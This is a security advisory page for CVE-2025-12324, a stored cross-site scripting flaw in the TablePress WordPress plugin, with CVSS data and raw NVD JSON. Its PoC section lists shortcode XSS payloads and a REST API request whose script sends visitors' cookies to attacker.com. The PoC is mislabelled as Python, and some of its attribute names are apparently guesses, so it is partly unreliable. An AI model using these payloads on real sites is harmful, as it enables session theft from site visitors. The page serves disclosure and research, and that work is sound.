Security Vulnerability Report
中文
CVE-2025-12324 CVSS 6.4 MEDIUM

CVE-2025-12324

Published: 2025-11-04 03:15:50
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The TablePress – Tables in WordPress made easy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `table` shortcode attributes in all versions up to, and including, 3.2.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

TablePress <= 3.2.3 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
## CVE-2025-12324 PoC - TablePress Stored XSS ## Affected Version: <= 3.2.3 ## Target: WordPress with TablePress plugin installed ## WordPress Shortcode Injection PoC ### Method 1: Inject via table shortcode custom_css parameter [table id=1 custom_css="</style><script>alert('XSS by TablePress CVE-2025-12324');</script>"] ### Method 2: Inject via style parameter [table id=1 style="xss:expression(alert('XSS'))"] ### Method 3: Inject via table HTML attributes [table id=1 custom_html="<img src=x onerror=alert(document.cookie)>"] ### Exploit Scenario: 1. Attacker with Contributor role or higher logs into WordPress 2. Attacker creates/edits a post or page 3. Attacker inserts malicious TablePress shortcode with XSS payload 4. When any user views the page, the XSS payload executes in their browser 5. Attacker can steal session cookies, perform actions as the victim ### HTTP Request Example (if API access available): POST /wp-json/wp/v2/pages/{id} HTTP/1.1 Host: target.com Content-Type: application/json Authorization: Bearer {token} { "content": "<p>Check this table:</p>[table id=1 custom_css=</style><script>fetch('https://attacker.com/steal?c='+document.cookie)</script>]" } ### Mitigation: Upgrade to TablePress version 3.2.4 or later

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12324", "sourceIdentifier": "[email protected]", "published": "2025-11-04T03:15:49.667", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The TablePress – Tables in WordPress made easy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `table` shortcode attributes in all versions up to, and including, 3.2.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/tablepress/tags/3.2.4/controllers/controller-frontend.php#L605", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4dbd8cac-9e4b-4353-9c62-9cabb60b927c?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.